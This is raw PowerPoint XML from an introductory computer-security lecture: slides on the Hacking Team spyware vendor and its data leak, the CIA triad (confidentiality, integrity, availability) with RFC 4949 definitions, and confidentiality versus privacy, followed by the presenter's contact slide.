              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Hacking Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a security company </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in Milan.</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en-US" dirty="0"/>
              <a:t>It sold offensive intrusion and surveillance services to many governments, police bodies and secret services all over the world (reports and reports have also been built directly reporting to the President of the United States of America, working with NSA, CIA and FBI)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has suffered a data breach that revealed the fact that the company sold their spywares to states with dictatorial regimes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The material was extensive and on first examination it appeared that the Hacking Team had billed the Lebanese army and Sudan, and that it had sold spying tools to Bahrain and Kazakhstan. Previously, Hacking Team denied any business relationship with Sudan.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known for their RAT (Remote Access Trojan) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>RCS Galileo</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breach they suffered is about 400gb and the archive has been leaked on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>github</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Wikileaks contains a myriad of emails exchanged between Hacking Team and his customers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://wikileaks.org/hackingteam/emails/)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1604856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olo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it-IT" u="sng" dirty="0"/>
              <a:t>grazie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto testo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it-IT" dirty="0"/>
              <a:t>Marco Urbano</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Elemento grafico 8" descr="Busta" title="Icona - Posta elettronica del relatore">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773C1382-ACE1-460F-A1B6-AB761A7D2E6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766191" y="4117720"/>
            <a:ext cx="218900" cy="218900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto testo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50A3BCC3-A277-4C0B-9EBA-EB53990D8EBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6062268" y="4121247"/>
            <a:ext cx="2910342" cy="238016"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>urbamarc@gmail.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Elemento grafico 10" descr="Collegamento">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0718E6E0-05A2-479C-AEA8-1A385EB7347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66191" y="4456766"/>
            <a:ext cx="244786" cy="244786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Segnaposto testo 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E382DE25-E72C-473B-AB0F-13DF377E6A8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6062268" y="4455231"/>
            <a:ext cx="2910342" cy="238016"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>marcourbano.github.io</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Segnaposto numero diapositiva 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91814EC9-246A-4C6E-941E-5774FE72F08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11914188" y="6402388"/>
            <a:ext cx="277812" cy="273050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Elemento grafico 2" descr="Social network">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31FD1CED-90B1-4C2D-8161-0AFF4C71B1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39652" y="4744025"/>
            <a:ext cx="297864" cy="244786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="CasellaDiTesto 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F7A5271-7480-47F9-BCA4-27EC6FEB4E47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5985091" y="4693247"/>
            <a:ext cx="3401291" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://www.linkedin.com/in/urbanomarco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415367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7548E021-6EB0-4963-989B-626A4099CB58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F11D4ED5-2037-43BD-A044-6D76E3CC0F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="432000"/>
            <a:ext cx="9131100" cy="432000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Security: a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>formal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>definition</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto testo 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D7EB59B-E915-4CD0-8A7A-9B8D56ACF0D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431799" y="1007999"/>
            <a:ext cx="8246979" cy="5418001"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>Formally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> «security» with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>its</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> key points.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="3200" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t>The so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> «security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>triad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t>»</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>defines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> the following key points:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="828675" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="828675" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>onfidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="828675" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>ntegrity</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="828675" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>vailability</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="3200" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t>The security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>triad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0" err="1"/>
              <a:t>called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t> «CIA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" u="sng" dirty="0" err="1"/>
              <a:t>Triad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" i="0" dirty="0"/>
              <a:t>»</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282513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E4A2AABC-E122-4CAC-9B0E-43087813E044}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F196A9A4-C030-447F-A0F1-B1B51C3904D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB300A2B-DD87-44F5-B716-58503D37CA5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="786063" y="1491916"/>
            <a:ext cx="8662737" cy="4678204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>“The property that information is not made available or disclosed to unauthorized individuals, entities, or processes [i.e., to any unauthorized system entity].”* </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>* [RFC 4949 – Internet Security Glossary]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312613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379E9387-3577-46FD-BEA6-A8F31CF3222A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8676BF95-7CB0-4429-A92C-B3BA8D5D42B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> vs privacy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{710B537F-F21A-4BB5-ACE3-2203EACC2684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630905" y="1735583"/>
            <a:ext cx="5582653" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>“The right of an entity (normally a person), acting in its own behalf, to determine the degree to which it will interact with its environment, including the degree to which the entity is willing to share information about itself with others.” [RFC 4949]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{433D1582-4CF2-45F0-BA41-66E4FC8DEA82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="4915490"/>
            <a:ext cx="9330056" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Privacy is one of the reasons that justify the need for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Privacy is (also) closely linked to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>anonymity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Anonymity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> is (also) the main requirement for a hacker to go unpunished.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297577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2F5BD5AF-1FC8-48B8-8ECC-E973D20FA029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
